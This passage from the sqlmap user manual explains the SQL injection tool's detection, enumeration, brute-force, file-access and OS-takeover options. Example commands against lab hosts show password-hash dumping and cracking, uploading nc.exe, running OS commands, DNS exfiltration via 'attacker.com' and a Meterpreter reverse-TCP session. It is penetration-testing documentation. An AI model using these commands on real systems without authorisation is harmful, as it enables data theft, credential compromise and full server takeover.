[hh:mm:04] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or
 HAVING clause' injectable 
[...]

Detection

These options can be used to customize the detection phase.

Level

Option: --level

This option requires an argument which specifies the level of tests to perform. There are five levels. The default value is 1 where limited number of tests (requests) are performed. Vice versa, level 5 will test verbosely for a much larger number of payloads and boundaries (as in pair of SQL payload prefix and suffix). The payloads used by sqlmap are specified in the textual file xml/payloads.xml. Following the instructions on top of the file, if sqlmap misses an injection, you should be able to add your own payload(s) to test for too!

Not only this option affects which payload sqlmap tries, but also which injection points are taken in exam: GET and POST parameters are always tested, HTTP Cookie header values are tested from level 2 and HTTP User-Agent/Referer headers’ value is tested from level 3.

All in all, the harder it is to detect a SQL injection, the higher the --level must be set.

It is strongly recommended to higher this value before reporting to the mailing list that sqlmap is not able to detect a certain injection point.

Risk

Option: --risk

This option requires an argument which specifies the risk of tests to perform. There are three risk values. The default value is 1 which is innocuous for the majority of SQL injection points. Risk value 2 adds to the default level the tests for heavy query time-based SQL injections and value 3 adds also OR-based SQL injection tests.

In some instances, like a SQL injection in an UPDATE statement, injecting an OR-based payload can lead to an update of all the entries of the table, which is certainly not what the attacker wants. For this reason and others this option has been introduced: the user has control over which payloads get tested, the user can arbitrarily choose to use also potentially dangerous ones. As per the previous option, the payloads used by sqlmap are specified in the textual file xml/payloads.xml and you are free to edit and add your owns.

Page comparison

Options: --string, --not-string, --regexp and --code

By default the distinction of a True query from a False one (rough concept behind boolean-based blind SQL injection vulnerabilities) is done by comparing the injected requests page content with the original not injected page content. Not always this concept works because sometimes the page content changes at each refresh even not injecting anything, for instance when the page has a counter, a dynamic advertisement banner or any other part of the HTML which is rendered dynamically and might change in time not only consequently to user’s input. To bypass this limit, sqlmap tries hard to identify these snippets of the response bodies and deal accordingly. Sometimes it may fail, that is why the user can provide a string (--string option) which should be present on original page (though it is not a requirement) and on all True injected query pages, but that it is not on the False ones. Instead of static string, the user can provide a regular expression (--regexp option). Alternatively, user can provide a string (--not-string option) which is not present on original page and not on all True injected query pages, but appears always on False ones.

Such data is easy for an user to retrieve, simply try to inject into the affected parameter an invalid value and compare manually the original (not injected) page content with the injected wrong page content. This way the distinction will be based upon string presence or regular expression match.

In cases when user knows that the distinction of a True query from a False one can be done using HTTP code (e.g. 200 for True and 401 for False), he can provide that information to sqlmap (e.g. --code=200).

Switches: --text-only and --titles

In cases when user knows that the distinction of a True query from a False one can be done using HTML title (e.g. Welcome for True and Forbidden for False), he can turn turn on title-based comparison using switch --titles.

In cases with lot of active content (e.g. scripts, embeds, etc.) in the HTTP responses’ body, you can filter pages (switch --text-only) just for their textual content. This way, in a good number of cases, you can automatically tune the detection engine.

Techniques

These options can be used to tweak testing of specific SQL injection techniques.

SQL injection techniques to test for

Option: --technique

This option can be used to specify which SQL injection type to test for. By default sqlmap tests for alltypes/techniques it supports.

In certain situations you may want to test only for one or few specific types of SQL injection thought and this is where this option comes into play.

This option requires an argument. Such argument is a string composed by any combination of B, E, U, S, T and Q characters where each letter stands for a different technique:

• B: Boolean-based blind
• E: Error-based
• U: Union query-based
• S: Stacked queries
• T: Time-based blind
• Q: Inline queries

For instance, you can provide ES if you want to test for and exploit error-based and stacked queries SQL injection types only. The default value is BEUSTQ.

Note that the string must include stacked queries technique letter, S, when you want to access the file system, takeover the operating system or access Windows registry hives.

Seconds to delay the DBMS response for time-based blind SQL injection

Option: --time-sec

It is possible to set the seconds to delay the response when testing for time-based blind SQL injection, by providing the --time-sec option followed by an integer. By default it’s value is set to 5 seconds.

Number of columns in UNION query SQL injection

Option: --union-cols

By default sqlmap tests for UNION query SQL injection technique using 1 to 10 columns. However, this range can be increased up to 50 columns by providing an higher --level value. See the relevant paragraph for more details.

You can manually tell sqlmap to test for this type of SQL injection with a specific range of columns by providing the tool with the option --union-cols followed by a range of integers. For instance, 12-16 means tests for UNION query SQL injection by using 12 up to 16 columns.

Character to use to test for UNION query SQL injection

Option: --union-char

By default sqlmap tests for UNION query SQL injection technique using NULL character. However, by providing a higher --level value sqlmap will performs tests also with a random number because there are some corner cases where UNION query tests with NULL fail, whereas with a random integer they succeed.

You can manually tell sqlmap to test for this type of SQL injection with a specific character by using option --union-char with desired character value (e.g. --union-char 123).

Table to use in FROM part of UNION query SQL injection

Option: --union-from

In some UNION query SQL injection cases there is a need to enforce the usage of valid and accessible table name in FROM clause. For example, Microsoft Access requires usage of such table. Without providing one UNION query SQL injection won’t be able to perform correctly (e.g. --union-from=users).

DNS exfiltration attack

Option: --dns-domain

DNS exfiltration SQL injection attack is described in paper Data Retrieval over DNS in SQL Injection Attacks, while presentation of it’s implementation inside sqlmap can be found in slides DNS exfiltration using sqlmap.

If user is controlling a machine registered as a DNS domain server (e.g. domain attacker.com) he can turn on this attack by using this option (e.g. --dns-domain attacker.com). Prerequisites for it to work is to run a sqlmap with Administrator privileges (usage of privileged port 53) and that one normal (blind) technique is available for exploitation. That’s solely the purpose of this attack is to speed up the process of data retrieval in case that at least one technique has been identified (in best case time-based blind). In case that error-based blind or UNION query techniques are available it will be skipped as those are preferred ones by default.

Second-order attack

Option: --second-order

Second-order SQL injection attack is an attack where result(s) of an injected payload in one vulnerable page is shown (reflected) at the other (e.g. frame). Usually that’s happening because of database storage of user provided input at the original vulnerable page.

You can manually tell sqlmap to test for this type of SQL injection by using option --second-orderwith the URL address of the web page where results are being shown.

Fingerprint

Extensive database management system fingerprint

Switches: -f or --fingerprint

By default the web application’s back-end database management system fingerprint is handled automatically by sqlmap. Just after the detection phase finishes and the user is eventually prompted with a choice of which vulnerable parameter to use further on, sqlmap fingerprints the back-end database management system and continues on with the injection by knowing which SQL syntax, dialect and queries to use to proceed with the attack within the limits of the database architecture.

If for any instance you want to perform an extensive database management system fingerprint based on various techniques like specific SQL dialects and inband error messages, you can provide the switch --fingerprint. sqlmap will perform a lot more requests and fingerprint the exact DBMS version and, where possible, operating system, architecture and patch level.

If you want the fingerprint to be even more accurate result, you can also provide the switch -b or --banner.

Enumeration

These options can be used to enumerate the back-end database management system information, structure and data contained in the tables. Moreover you can run your own SQL statements.

Retrieve all

Switch: --all

This switch can be used in situations where user wants to retrieve everything remotely accessible by using a single switch. This is not recommended as it will generate large number of requests retrieving both useful and unuseful data.

Banner

Switch: -b or --banner

Most of the modern database management systems have a function and/or an environment variable which returns the database management system version and eventually details on its patch level, the underlying system. Usually the function is version() and the environment variable is @@version, but this vary depending on the target DBMS.

Example against an Oracle target:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int.php?id=1" -\
-banner

[...]
[xx:xx:11] [INFO] fetching banner
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: Oracle
banner:    'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'

Session user

Switch: --current-user

With this switch it is possible to retrieve the database management system’s user which is effectively performing the query against the back-end DBMS from the web application.

Current database

Switch: --current-db

With this switch it is possible to retrieve the database management system’s database name that the web application is connected to.

Server hostname

Switch: --hostname

With this switch it is possible to retrieve the database management system’s hostname.

Example against a MySQL target:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --\
hostname

[...]
[xx:xx:04] [INFO] fetching server hostname
[xx:xx:04] [INFO] retrieved: debian-5.0-i386
hostname:    'debian-5.0-i386'

Detect whether or not the session user is a database administrator

Switch: --is-dba

It is possible to detect if the current database management system session user is a database administrator, also known as DBA. sqlmap will return True if it is, vice versa False.

List database management system users

Switch: --users

When the session user has read access to the system table containing information about the DBMS users, it is possible to enumerate the list of users.

List and crack database management system users password hashes

Switch: --passwords

When the session user has read access to the system table containing information about the DBMS users’ passwords, it is possible to enumerate the password hashes for each database management system user. sqlmap will first enumerate the users, then the different password hashes for each of them.

Example against a PostgreSQL target:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --\
passwords -v 1

[...]
back-end DBMS: PostgreSQL
[hh:mm:38] [INFO] fetching database users password hashes
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
[hh:mm:42] [INFO] using hash method: 'postgres_passwd'
what's the dictionary's location? [/software/sqlmap/txt/wordlist.txt] 
[hh:mm:46] [INFO] loading dictionary from: '/software/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] n
[hh:mm:48] [INFO] starting dictionary attack (postgres_passwd)
[hh:mm:49] [INFO] found: 'testpass' for user: 'testuser'
[hh:mm:50] [INFO] found: 'testpass' for user: 'postgres'
database management system users password hashes:
[*] postgres [1]:
    password hash: md5d7d880f96044b72d0bba108ace96d1e4
    clear-text password: testpass
[*] testuser [1]:
    password hash: md599e5ea7a6f7c3269995cba3927fd0093
    clear-text password: testpass

Not only sqlmap enumerated the DBMS users and their passwords, but it also recognized the hash format to be PostgreSQL, asked the user whether or not to test the hashes against a dictionary file and identified the clear-text password for the postgres user, which is usually a DBA along the other user, testuser, password.

This feature has been implemented for all DBMS where it is possible to enumerate users’ password hashes, including Oracle and Microsoft SQL Server pre and post 2005.

You can also provide the option -U to specify the specific user who you want to enumerate and eventually crack the password hash(es). If you provide CU as username it will consider it as an alias for current user and will retrieve the password hash(es) for this user.

List database management system users privileges

Switch: --privileges

When the session user has read access to the system table containing information about the DBMS users, it is possible to enumerate the privileges for each database management system user. By the privileges, sqlmap will also show you which are database administrators.

You can also provide the option -U to specify the user who you want to enumerate the privileges.

If you provide CU as username it will consider it as an alias for current user and will enumerate the privileges for this user.

On Microsoft SQL Server, this feature will display you whether or not each user is a database administrator rather than the list of privileges for all users.

List database management system users roles

Switch: --roles

When the session user has read access to the system table containing information about the DBMS users, it is possible to enumerate the roles for each database management system user.

You can also provide the option -U to specify the user who you want to enumerate the privileges.

If you provide CU as username it will consider it as an alias for current user and will enumerate the privileges for this user.

This feature is only available when the DBMS is Oracle.

List database management system’s databases

Switch: --dbs

When the session user has read access to the system table containing information about available databases, it is possible to enumerate the list of databases.

Enumerate database’s tables

Switches and option: --tables, --exclude-sysdbs and -D

When the session user has read access to the system table containing information about databases’ tables, it is possible to enumerate the list of tables for a specific database management system’s databases.

If you do not provide a specific database with option -D, sqlmap will enumerate the tables for all DBMS databases.

You can also provide the switch --exclude-sysdbs to exclude all system databases.

Note that on Oracle you have to provide the TABLESPACE_NAME instead of the database name.

Enumerate database table columns

Switch and options: --columns, -C, -T and -D

When the session user has read access to the system table containing information about database’s tables, it is possible to enumerate the list of columns for a specific database table. sqlmap also enumerates the data-type for each column.

This feature depends on option -T to specify the table name and optionally on -D to specify the database name. When the database name is not specified, the current database name is used. You can also provide the -C option to specify the table columns name like the one you provided to be enumerated.

Example against a SQLite target:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/sqlite/get_int.php?id=1" -\
-columns -D testdb -T users -C name
[...]
Database: SQLite_masterdb
Table: users
[3 columns]
+---------+---------+
| Column  | Type    |
+---------+---------+
| id      | INTEGER |
| name    | TEXT    |
| surname | TEXT    |
+---------+---------+

Note that on PostgreSQL you have to provide public or the name of a system database. That’s because it is not possible to enumerate other databases tables, only the tables under the schema that the web application’s user is connected to, which is always aliased by public.

Enumerate database management system schema

Switches: --schema and --exclude-sysdbs

User can retrieve a DBMS schema by using this switch. Schema listing will contain all databases, tables and columns, together with their respective types. In combination with --exclude-sysdbs only part of the schema containing non-system databases will be retrieved and shown.

Example against a MySQL target:

$ python sqlmap.py -u "http://192.168.48.130/sqlmap/mysql/get_int.php?id=1" --s\
chema--batch --exclude-sysdbs

[...]
Database: owasp10
Table: accounts
[4 columns]
+-------------+---------+
| Column      | Type    |
+-------------+---------+
| cid         | int(11) |
| mysignature | text    |
| password    | text    |
| username    | text    |
+-------------+---------+

Database: owasp10
Table: blogs_table
[4 columns]
+--------------+----------+
| Column       | Type     |
+--------------+----------+
| date         | datetime |
| blogger_name | text     |
| cid          | int(11)  |
| comment      | text     |
+--------------+----------+

Database: owasp10
Table: hitlog
[6 columns]
+----------+----------+
| Column   | Type     |
+----------+----------+
| date     | datetime |
| browser  | text     |
| cid      | int(11)  |
| hostname | text     |
| ip       | text     |
| referer  | text     |
+----------+----------+

Database: testdb
Table: users
[3 columns]
+---------+---------------+
| Column  | Type          |
+---------+---------------+
| id      | int(11)       |
| name    | varchar(500)  |
| surname | varchar(1000) |
+---------+---------------+
[...]

Retrieve number of entries for table(s)

Switch: --count

In case that user wants just to know the number of entries in table(s) prior to dumping the desired one, he can use this switch.

Example against a Microsoft SQL Server target:

$ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1"\
 --count -D testdb
[...]
Database: testdb
+----------------+---------+
| Table          | Entries |
+----------------+---------+
| dbo.users      | 4       |
| dbo.users_blob | 2       |
+----------------+---------+

Dump database table entries

Switch and options: --dump, -C, -T, -D, --start, --stop, --first, --last, --pivot-columnand --where

When the session user has read access to a specific database’s table it is possible to dump the table entries.

This functionality depends on option -T to specify the table name and optionally on option -D to specify the database name. If the table name is provided, but the database name is not, the current database name is used.

Example against a Firebird target:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/firebird/get_int.php?id=1"\
 --dump -T users
[...]
Database: Firebird_masterdb
Table: USERS
[4 entries]
+----+--------+------------+
| ID | NAME   | SURNAME    |
+----+--------+------------+
| 1  | luther | blisset    |
| 2  | fluffy | bunny      |
| 3  | wu     | ming       |
| 4  | NULL   | nameisnull |
+----+--------+------------+

This switch can also be used to dump all tables’ entries of a provided database. You simply have to provide sqlmap with the switch --dump along with only the option -D (no -T and no -C).

You can also provide a comma-separated list of the specific columns to dump with the option -C.

sqlmap also generates for each table dumped the entries in a CSV format textual file. You can see the absolute path where sqlmap creates the file by providing a verbosity level greater than or equal to 1.

If you want to dump only a range of entries, then you can provide options --start and/or --stopto respectively start to dump from a certain entry and stop the dump at a certain entry. For instance, if you want to dump only the first entry, provide --stop 1 in your command line. Vice versa if, for instance, you want to dump only the second and third entry, provide --start 1 --stop 3.

It is also possible to specify which single character or range of characters to dump with options --first and --last. For instance, if you want to dump columns’ entries from the third to the fifth character, provide --first 3 --last 5. This feature only applies to the blind SQL injection techniques because for error-based and UNION query SQL injection techniques the number of requests is exactly the same, regardless of the length of the column’s entry output to dump.

Sometimes (e.g. for Microsoft SQL Server, Sybase and SAP MaxDB) it is not possible to dump the table rows straightforward by using OFFSET m, n mechanism because of lack of similar. In such cases sqlmap dumps the content by determining the most suitable pivot column (the one with most unique values) whose values are used later on for retrieval of other column values. If it is necessary to enforce the usage of particular pivot column because the automatically chosen one is not suitable (e.g. because of lack of table dump results) you can use option --pivot-column (e.g. --pivot-column=id).

In case that you want to constraint the dump to specific column values (or ranges) you can use option --where. Provided logical operation will be automatically used inside the WHERE clause. For example, if you use --where="id>3" only table rows having value of column id greater than 3 will be retrieved (by appending WHERE id>3 to used dumping queries).

As you may have noticed by now, sqlmap is flexible: you can leave it to automatically dump the whole database table or you can be very precise in which characters to dump, from which columns and which range of entries.

Dump all databases tables entries

Switches: --dump-all and --exclude-sysdbs

It is possible to dump all databases tables entries at once that the session user has read access on.

You can also provide the switch --exclude-sysdbs to exclude all system databases. In that case sqlmap will only dump entries of users’ databases tables.

Note that on Microsoft SQL Server the master database is not considered a system database because some database administrators use it as a users’ database.

Search for columns, tables or databases

Switch and options: --search, -C, -T, -D

This switch allows you to search for specific database names, specific tables across all databases or specific columns across all databases’ tables.

This is useful, for instance, to identify tables containing custom application credentials where relevant columns’ names contain string like name and pass.

Switch --search needs to be used in conjunction with one of the following support options:

• -C following a list of comma-separated column names to look for across the whole database management system.
• -T following a list of comma-separated table names to look for across the whole database management system.
• -D following a list of comma-separated database names to look for across the database management system.

Run custom SQL statement

Option and switch: --sql-query and --sql-shell

The SQL query and the SQL shell features allow to run arbitrary SQL statements on the database management system. sqlmap automatically dissects the provided statement, determines which technique is appropriate to use to inject it and how to pack the SQL payload accordingly.

If the query is a SELECT statement, sqlmap will retrieve its output. Otherwise it will execute the query through the stacked query SQL injection technique if the web application supports multiple statements on the back-end database management system. Beware that some web application technologies do not support stacked queries on specific database management systems. For instance, PHP does not support stacked queries when the back-end DBMS is MySQL, but it does support when the back-end DBMS is PostgreSQL.

Examples against a Microsoft SQL Server 2000 target:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --\
sql-query "SELECT 'foo'" -v 1

[...]
[hh:mm:14] [INFO] fetching SQL SELECT query output: 'SELECT 'foo''
[hh:mm:14] [INFO] retrieved: foo
SELECT 'foo':    'foo'

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --\
sql-query "SELECT 'foo', 'bar'" -v 2

[...]
[hh:mm:50] [INFO] fetching SQL SELECT query output: 'SELECT 'foo', 'bar''
[hh:mm:50] [INFO] the SQL query provided has more than a field. sqlmap will now 
unpack it into distinct queries to be able to retrieve the output even if we are
 going blind
[hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS 
VARCHAR(8000)), (CHAR(32)))
[hh:mm:50] [INFO] retrieved: foo
[hh:mm:50] [DEBUG] performed 27 queries in 0 seconds
[hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(98)+CHAR(97)+CHAR(114)) AS VA
RCHAR(8000)), (CHAR(32)))
[hh:mm:50] [INFO] retrieved: bar
[hh:mm:50] [DEBUG] performed 27 queries in 0 seconds
SELECT 'foo', 'bar':    'foo, bar'

As you can see, sqlmap splits the provided query into two different SELECT statements then retrieves the output for each separate query.

If the provided query is a SELECT statement and contains a FROM clause, sqlmap will ask you if such statement can return multiple entries. In that case the tool knows how to unpack the query correctly to count the number of possible entries and retrieve its output, entry per entry.

The SQL shell option allows you to run your own SQL statement interactively, like a SQL console connected to the database management system. This feature provides TAB completion and history support too.

Brute force

These switches can be used to run brute force checks.

Brute force tables names

Switch: --common-tables

There are cases where switch --tables can not be used to retrieve the databases’ table names. These cases usually fit into one of the following categories:

• The database management system is MySQL < 5.0 where information_schema is not available.
• The database management system is Microsoft Access and system table MSysObjects is not readable – default setting.
• The session user does not have read privileges against the system table storing the scheme of the databases.

If any of the first two cases apply and you provided the switch --tables, sqlmap will prompt you with a question to fall back to this technique. Either of these cases apply to your situation, sqlmap can possibly still identify some existing tables if you provide it with the switch --common-tables. sqlmap will perform a brute-force attack in order to detect the existence of common tables across the DBMS.

The list of common table names is txt/common-tables.txt and you can edit it as you wish.

Example against a MySQL 4.1 target:

$ python sqlmap.py -u "http://192.168.136.129/mysql/get_int_4.php?id=1" --commo\
n-tables -D testdb --banner

[...]
[hh:mm:39] [INFO] testing MySQL
[hh:mm:39] [INFO] confirming MySQL
[hh:mm:40] [INFO] the back-end DBMS is MySQL
[hh:mm:40] [INFO] fetching banner
web server operating system: Windows
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS operating system: Windows
back-end DBMS: MySQL < 5.0.0
banner:    '4.1.21-community-nt'

[hh:mm:40] [INFO] checking table existence using items from '/software/sqlmap/tx
t/common-tables.txt'
[hh:mm:40] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 8
[hh:mm:43] [INFO] retrieved: users

Database: testdb
[1 table]
+-------+
| users |
+-------+

Brute force columns names

Switch: --common-columns

As per tables, there are cases where switch --columns can not be used to retrieve the databases’ tables’ column names. These cases usually fit into one of the following categories:

• The database management system is MySQL < 5.0 where information_schema is not available.
• The database management system is Microsoft Access where this kind of information is not available inside system tables.
• The session user does not have read privileges against the system table storing the scheme of the databases.

If any of the first two cases apply and you provided the switch --columns, sqlmap will prompt you with a question to fall back to this technique. Either of these cases apply to your situation, sqlmap can possibly still identify some existing tables if you provide it with the switch --common-columns. sqlmap will perform a brute-force attack in order to detect the existence of common columns across the DBMS.

The list of common table names is txt/common-columns.txt and you can edit it as you wish.

User-defined function injection

These options can be used to create custom user-defined functions.

Inject custom user-defined functions (UDF)

Switch and option: --udf-inject and --shared-lib

You can inject your own user-defined functions (UDFs) by compiling a MySQL or PostgreSQL shared library, DLL for Windows and shared object for Linux/Unix, then provide sqlmap with the path where the shared library is stored locally on your machine. sqlmap will then ask you some questions, upload the shared library on the database server file system, create the user-defined function(s) from it and, depending on your options, execute them. When you are finished using the injected UDFs, sqlmap can also remove them from the database for you.

These techniques are detailed in the white paper Advanced SQL injection to operating system full control.

Use option --udf-inject and follow the instructions.

If you want, you can specify the shared library local file system path via command line too by using --shared-lib option. Vice versa sqlmap will ask you for the path at runtime.

This feature is available only when the database management system is MySQL or PostgreSQL.

File system access

Read a file from the database server’s file system

Option: --file-read

It is possible to retrieve the content of files from the underlying file system when the back-end database management system is either MySQL, PostgreSQL or Microsoft SQL Server, and the session user has the needed privileges to abuse database specific functionalities and architectural weaknesses. The file specified can be either a textual or a binary file. sqlmap will handle it properly.

These techniques are detailed in the white paper Advanced SQL injection to operating system full control.

Example against a Microsoft SQL Server 2005 target to retrieve a binary file:

$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?nam\
e=luther" --file-read "C:/example.exe" -v 1

[...]
[hh:mm:49] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2000
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005

[hh:mm:50] [INFO] fetching file: 'C:/example.exe'
[hh:mm:50] [INFO] the SQL query provided returns 3 entries
C:/example.exe file saved to:    '/software/sqlmap/output/192.168.136.129/files/
C__example.exe'
[...]

$ ls -l output/192.168.136.129/files/C__example.exe 
-rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.129/files/C_
_example.exe

$ file output/192.168.136.129/files/C__example.exe 
output/192.168.136.129/files/C__example.exe: PE32 executable for MS Windows (GUI
) Intel 80386 32-bit

Upload a file to the database server’s file system

Options: --file-write and --file-dest

It is possible to upload a local file to the database server’s file system when the back-end database management system is either MySQL, PostgreSQL or Microsoft SQL Server, and the session user has the needed privileges to abuse database specific functionalities and architectural weaknesses. The file specified can be either a textual or a binary file. sqlmap will handle it properly.

These techniques are detailed in the white paper Advanced SQL injection to operating system full control.

Example against a MySQL target to upload a binary UPX-compressed file:

$ file /software/nc.exe.packed 
/software/nc.exe.packed: PE32 executable for MS Windows (console) Intel 80386 32
-bit

$ ls -l /software/nc.exe.packed
-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /software/nc.exe.packed

$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" -\
-file-write "/software/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1

[...]
[hh:mm:29] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or 2008
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: MySQL >= 5.0.0

[...]
do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been success
fully written on the back-end DBMS file system? [Y/n] y
[hh:mm:52] [INFO] retrieved: 31744
[hh:mm:52] [INFO] the file has been successfully written and its size is 31744 b
ytes, same size as the local file '/software/nc.exe.packed'

Operating system takeover

Run arbitrary operating system command

Option and switch: --os-cmd and --os-shell

It is possible to run arbitrary commands on the database server’s underlying operating system when the back-end database management system is either MySQL, PostgreSQL or Microsoft SQL Server, and the session user has the needed privileges to abuse database specific functionalities and architectural weaknesses.

On MySQL and PostgreSQL, sqlmap uploads (via the file upload functionality explained above) a shared library (binary file) containing two user-defined functions, sys_exec() and sys_eval(), then it creates these two functions on the database and calls one of them to execute the specified command, depending on user’s choice to display the standard output or not. On Microsoft SQL Server, sqlmap abuses the xp_cmdshell stored procedure: if it is disabled (by default on Microsoft SQL Server >= 2005), sqlmap re-enables it; if it does not exist, sqlmap creates it from scratch.

When the user requests the standard output, sqlmap uses one of the enumeration SQL injection techniques (blind, inband or error-based) to retrieve it. Vice versa, if the standard output is not required, stacked query SQL injection technique is used to execute the command.

These techniques are detailed in the white paper Advanced SQL injection to operating system full control.

Example against a PostgreSQL target:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --\
os-cmd id -v 1

[...]
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: PostgreSQL
[hh:mm:12] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:12] [INFO] the back-end DBMS operating system is Linux
[hh:mm:12] [INFO] testing if current user is DBA
[hh:mm:12] [INFO] detecting back-end DBMS version from its banner
[hh:mm:12] [INFO] checking if UDF 'sys_eval' already exist
[hh:mm:12] [INFO] checking if UDF 'sys_exec' already exist
[hh:mm:12] [INFO] creating UDF 'sys_eval' from the binary UDF file
[hh:mm:12] [INFO] creating UDF 'sys_exec' from the binary UDF file
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:    'uid=104(postgres) gid=106(postgres) groups=106(post
gres)'

[hh:mm:19] [INFO] cleaning up the database management system
do you want to remove UDF 'sys_eval'? [Y/n] y
do you want to remove UDF 'sys_exec'? [Y/n] y
[hh:mm:23] [INFO] database management system cleanup finished
[hh:mm:23] [WARNING] remember that UDF shared object files saved on the file sys
tem can only be deleted manually

It is also possible to simulate a real shell where you can type as many arbitrary commands as you wish. The option is --os-shell and has the same TAB completion and history functionalities that --sql-shell has.

Where stacked queries has not been identified on the web application (e.g. PHP or ASP with back-end database management system being MySQL) and the DBMS is MySQL, it is still possible to abuse the SELECT clause’s INTO OUTFILE to create a web backdoor in a writable folder within the web server document root and still get command execution assuming the back-end DBMS and the web server are hosted on the same server. sqlmap supports this technique and allows the user to provide a comma-separated list of possible document root sub-folders where try to upload the web file stager and the subsequent web backdoor. Also, sqlmap has its own tested web file stagers and backdoors for the following languages:

• ASP
• ASP.NET
• JSP
• PHP

Out-of-band stateful connection: Meterpreter & friends

Switches and options: --os-pwn, --os-smbrelay, --os-bof, --priv-esc, --msf-path and --tmp-path

It is possible to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system when the back-end database management system is either MySQL, PostgreSQL or Microsoft SQL Server, and the session user has the needed privileges to abuse database specific functionalities and architectural weaknesses. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice.

sqlmap relies on Metasploit to create the shellcode and implements four different techniques to execute it on the database server. These techniques are:

• Database in-memory execution of the Metasploit’s shellcode via sqlmap own user-defined function sys_bineval(). Supported on MySQL and PostgreSQL – switch --os-pwn.
• Upload and execution of a Metasploit’s stand-alone payload stager via sqlmap own user-defined function sys_exec() on MySQL and PostgreSQL or via xp_cmdshell() on Microsoft SQL Server – switch --os-pwn.
• Execution of Metasploit’s shellcode by performing a SMB reflection attack (MS08-068) with a UNC path request from the database server to the attacker’s machine where the Metasploit smb_relay server exploit listens. Supported when running sqlmap with high privileges (uid=0) on Linux/Unix and the target DBMS runs as Administrator on Windows – switch --os-smbrelay.
• Database in-memory execution of the Metasploit’s shellcode by exploiting Microsoft SQL Server 2000 and 2005 sp_replwritetovarbin stored procedure heap-based buffer overflow (MS09-004). sqlmap has its own exploit to trigger the vulnerability with automatic DEP memory protection bypass, but it relies on Metasploit to generate the shellcode to get executed upon successful exploitation – switch --os-bof.

These techniques are detailed in the white paper Advanced SQL injection to operating system full control and in the slide deck Expanding the control over the operating system from the database.

Example against a MySQL target:

$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/iis/get_int_55.aspx?\
id=1" --os-pwn --msf-path /software/metasploit

[...]
[hh:mm:31] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
[hh:mm:31] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:31] [INFO] the back-end DBMS operating system is Windows
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
> 
[hh:mm:32] [INFO] testing if current user is DBA
[hh:mm:32] [INFO] fetching current user
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
> 
[hh:mm:33] [INFO] checking if UDF 'sys_bineval' already exist
[hh:mm:33] [INFO] checking if UDF 'sys_exec' already exist
[hh:mm:33] [INFO] detecting back-end DBMS version from its banner
[hh:mm:33] [INFO] retrieving MySQL base directory absolute path
[hh:mm:34] [INFO] creating UDF 'sys_bineval' from the binary UDF file
[hh:mm:34] [INFO] creating UDF 'sys_exec' from the binary UDF file
how do you want to execute the Metasploit shellcode on the back-end database und
erlying operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Stand-alone payload stager (file system way)
> 
[hh:mm:35] [INFO] creating Metasploit Framework multi-stage shellcode 
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on 
all ports 
between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection
> 
which is the local address? [192.168.136.1] 
which local port number do you want to use? [60641] 
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 
[hh:mm:40] [INFO] creation in progress ... done
[hh:mm:43] [INFO] running Metasploit Framework command line interface locally, p
lease wait..

                                _
                                | |      o
_  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
|  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
                        /|
                        \|


    =[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 674 exploits - 351 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
    =[ svn r12272 updated 4 days ago (2011.04.07)

PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => thread
LPORT => 60641
LHOST => 192.168.136.1
[*] Started reverse handler on 192.168.136.1:60641 
